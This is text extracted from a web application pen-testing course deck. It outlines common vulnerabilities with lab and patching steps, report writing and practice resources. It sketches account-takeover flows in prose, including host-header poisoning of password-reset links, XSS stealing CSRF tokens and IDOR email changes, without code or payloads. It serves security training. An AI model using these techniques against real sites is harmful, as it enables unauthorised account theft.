Web

Application
Pen-Testing
Course
Who am i?

• Also known as FlEx.

• Cyber Security Engineer @ CyShield.

• I also make videos about hacking on Youtube.

• [Small] Bug Hunter.

Mohamed Sayed
What we will talk about?
• What you need to start.
• How Web App work
• Vulnerabilities

• Explain the Vulnerability

• Solve Lab for it.

• Type of attacks for this vulnerability

• Explain the code which cause the bug.

• Solve the bug in the code.

• How to write a report.

• Skills you need.
• How to be good & next step.
What I need to start.
Web Applications
● Client Side [HTML, JS, CSS]

● Server Side [PHP, [Link], etc….]

● HTTP / HTTPS

● What is Headers
HTTP / HTTPS

Comparison HTTP HTTPS

Secured False True

Port 80 443

SSL Certificate False True

Encryption False True

 What is Headers

Headers HTTP

Host Contain host name

(Host: [Link])
User-Agent Contain Browser info
(User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101
Firefox/67.0)
Content-Type Contain the type of the request or response
(Content-Type: application/json)
Referer Contain the link which come from
(Referer: [Link]
Vulnerabilities
Vulnerabilities
• XSS
• CSRF
• LFI / Path traversal
• IDOR
• File Upload
• SQL injection
• Insecure Deserialization
• XXE
• Clickjacking
• JSONP
• Account Takeover
• PostMessage
• CORS
• How to Chain Bugs?
Vulnerabilities
XSS
Vulnerabilities (XSS)
• What is XSS?

• What can I do with XSS?

• Types of XSS.

• Filters & Bypasses for XSS.

• Solve XSS Lab.

• Patch bug in code.

Vulnerabilities
CSRF
Vulnerabilities (CSRF)
• What is CSRF?

• What can I do with CSRF?

• Bypasses for CSRF.

• Solve Lab.

• Patch bug in code.

Vulnerabilities
LFI/path traversal
Vulnerabilities (LFI/Path traversal)
• What is LFI & Path traversal?

• What is different between LFI & Path traversal?

• What can I do LFI & Path traversal?

• Solve lab.

• Patch bug in code.

Vulnerabilities
IDOR
Vulnerabilities (IDOR)
• What is IDOR?

• What can I do with IDOR?

• Solve Lab

• Patch bug in code.

Vulnerabilities
File Upload
Vulnerabilities (File Upload)
• What is File Upload vulnerability?

• What can I do with File Upload vulnerability?

• Filters & Bypasses for File upload.

• Solve lab.

• Patch bug in code.

Vulnerabilities
SQL injection
Vulnerabilities (SQL injection)
• What is SQL injection?

• What can I do with SQL injection?

• Types of SQL injection.

• Filters and Bypasses for SQL Injection.

• Solve lab.

• Patch bug in code.

Vulnerabilities
Insecure Deserialization
Vulnerabilities (Insecure Deserialization)
• What is Insecure Deserialization?

• What can I do with Insecure Deserialization?

• Solve lab.

• Patch bug in code

Vulnerabilities
XXE
Vulnerabilities (XXE)
• What is XML & XXE?

• What can I do with XXE?

• Why websites use XML.

• Types of XXE.

• Solve lab.

• Patch bug in code.

First line contain the Meta Data

Second line contain Root Element Opening

Third & Fourth line is children of root element

Fifth line is the closing of root element

Not Allowed:

1. Tag name is case sensitive

2. ‘”>< Not allowed in the XML doc directly
Entity Let’s say it like a variable

Document type definition (DTD) define the Entities

 Entities Types
● General

We saw this type in preview example

● Parameter

This type only in DTD and useful for creating entity have value another entity.

● Predefined

This type is used predefined values which could break the syntax like using (&#x3C;)
which is (<)
 Features we can use
1. Using System Keyword we can use External Entity.

2. XML accept any valid URI

 Types
• Inband

• The common type which display the output on the screen.

• Error Based

• This type is parsing the XML and you can see just Errors.

• (Out of band) OOB

• This type is Blind without any errors or results, you can do some requests to check
it.
 Exploit
Inband Type

Vulnerable
Send payload in function parsing Print the result
request payload

Error Based

Vulnerable Return error

Send payload in
function parsing contain the
request
payload result
 Exploit
Error Based Example

If we send a payload like that

The output will be in error like that

 Exploit
OOB Type

Vulnerable
Send payload in function parsing No result printed
request payload

The payload is
executed
Vulnerabilities
Clickjacking
Vulnerabilities (Clickjacking)
• What is Clickjacking?

• What can I do with Clickjacking?

• Solve lab.

• Patch bug.
Vulnerabilities
JSONP
Vulnerabilities (JSONP)
• What is JSONP?

• What can I do with JSONP?

• Why websites use JSONP?

• Solve lab.

• Patch bug.
Vulnerabilities
ATO
Vulnerabilities (ATO)
• What is ATO?

• How to gain ATO?

• Patch bugs.
How to gain ATO

• CSRF

• IDOR

• Host Header injection

• Open redirect with OAuth

• CSRF with OAuth

How to gain ATO (CSRF)
Exploit Page Vulnerable Page

Send request
Change Email when receive a request
How to gain ATO (IDOR)

User 1000

Change email of user 1001 Change email of user 1000

200 OK 200 OK
How to gain ATO (Host Header Injection)

Use forgot Catch the

password function request

vulnerable = true Change host

Link sent with ur
header value to ur
domain to victim
domain

Token sent to your

Victim open the link
domain
OAuth

Client Application  Web App want to access user’s data

Resource Owner  The user.

OAuth service provider  application that control user’s data and access to it.
OAuth
Client App User-Agent OAuth
Auth request
service API
1

Resource 2
Owner User Login & consent
/Auth
Access Token
/oauth-login
3

API Call
4

/info
5

Data
How to gain ATO (Open redirect with OAuth)
How to gain ATO (CSRF with OAuth)
Client App User-Agent OAuth
Auth request
service API
1

Resource 2
Owner User Login & consent
/Auth
Access Token & connect
Social account
/oauth-login
3

API Call
4

/info
5

Data
Vulnerabilities
PostMessage
Vulnerabilities (PostMessage)
• What is PostMessage?

• What can I do with PostMessage?

• How to make PostMessage a bug.

• Solve lab.

• Patch bug.
Explain
We can use it postMessage with iframe or pop-up

To create event listener

we will give it a name and a
function to call when it used,
this function will take the value
from postMessage and do its
actions.

[Link]  will display the origin which send the request.

[Link]  will display the sent value.

We can use the following like to check and validate the origins before take the value
but the check have an issue and could be
bypassed.
 Exploit
Vulnerable page  Have a listener
Exploit Page
Exploit Page  send postMessage with
malicious value like XSS payload

The pages will communicate together using Vulnerable page in iframe

the postMessage.
Vulnerabilities
CORS
Vulnerabilities (CORS)
• What is CORS?

• What can I do with CORS?

• Why websites use CORS?

• Bypass Filter.

• Solve Labs.

• Patch Bug.
Vulnerabilities
Chaining Bugs
Vulnerabilities (Chaining Bugs)

• XSS to ATO

• Self-XSS to Reflected XSS

• CORS without useful result

XSS to ATO

Use payload to steal Use CSRF token to

Found XSS the CSRF token from send request to
the page change victim email
XSS to ATO Exploit
 Self-XSS to Reflected XSS
- By using Clickjacking

- Victim will copy the xss

payload to vulnerable page

Vulnerable page

Exploit page
un-exploitable CORS
Exploit Server Vulnerable Endpoint
Vulnerable Endpoint

Send Request

XMLHttpReqeuest
Backend Server
Code

Return Null or dummy Data

Another vulnerable Endpoint

Send Request to change value

XMLHttpReqeuest Content-Type: application/json

Body: {“name”:”Hacker”}
Code Backend Server

Return 200 OK Success

Writing A Good Report

● Choose well title to the vulnerability.

● Explain Finding.

● Risk and Impact [Business impact]

● Recommendations

● Proof-of-Concept

● References

● Ref [[Link]
Skills

● Scripting / write a code

● Write reports

● Dealing with clients

● Understand web technologies

○ Protocols

○ Html / Html5

○ Data formats (JSON, XML, CSV)

○ Web Framework

○ Programming languages (PHP, JS, etc..)

Improve yourself & Next Step

● PortSwigger

● PentesterLab

● Increase your knowledge [reading * 1000]

● Practice
Thank you

Talk to me if you need anything.

• Facebook: @flex0geek

• Twitter: @flex0geek

• Linkedin: @flex0geek

• Blog: [Link]

• Youtube: [Link]